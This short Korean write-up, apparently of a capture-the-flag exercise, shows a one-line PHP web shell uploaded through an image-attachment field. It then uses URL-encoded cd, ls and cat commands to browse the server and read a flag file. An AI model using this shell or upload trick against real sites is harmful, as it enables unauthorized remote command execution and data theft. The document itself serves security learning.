정의
서버에 원격으로 명령을 실행할 수 있도록 하는 스크립트
ex) php코드
<?php
system($_GET['cmd']);
?>system()외부프로그램을 실행하고 그 출력을 직접 브라우저에 반환하는 함수$_GET[]URL로 전달된 프로미터 값을 받는 역할- ULR 파라미터로 cmd명령어를 전달하면 실행됨
ex)URL.com/file/test.php?cmd=lsls 명령어 실행
이미지 파일 첨부하는 곳에 php파일 첨부
| 게시판 첨부사진 |
|---|
 |
| 게시판 첨부한 사진 |
|---|
 |
첨부한 파일 경로 확인 & 다운로드 요청
| url카피 | 요청 |
|---|---|
 |  |
명령어 TEST
다운로드 요청경로에 GET방식으로 파라미터 전송
| pwd전송 |
|---|
 |
flag찾기
cmd명령어를 이용하여 flag찾기
사용한 cmd명령어
cd - 폴더이동
ls - 현재폴더에 파일확인
cat - 파일 확인
../ - 상위폴더
./ - 현재폴더
%2F - /를 URL인코딩한 문자
%26 - &를 URL인코딩한 문자
상위 폴더 진입
cd+..%2F+%26%26+cd+..%2F+%26%26+ls
| 파라미터 전송&결과 |
|---|
 |
수상해보이는 폴더 진입
cd+..%2F+%26%26+cd+..%2F+%26%26+cd+important_data+%26%26+ls
| 파라미터 전송&결과 |
|---|
 |
flag.txt확인
cd+..%2F+%26%26+cd+..%2F+%26%26+cd+important_data+%26%26+cat+flag.txt
| 파라미터 전송&결과 |
|---|
 |
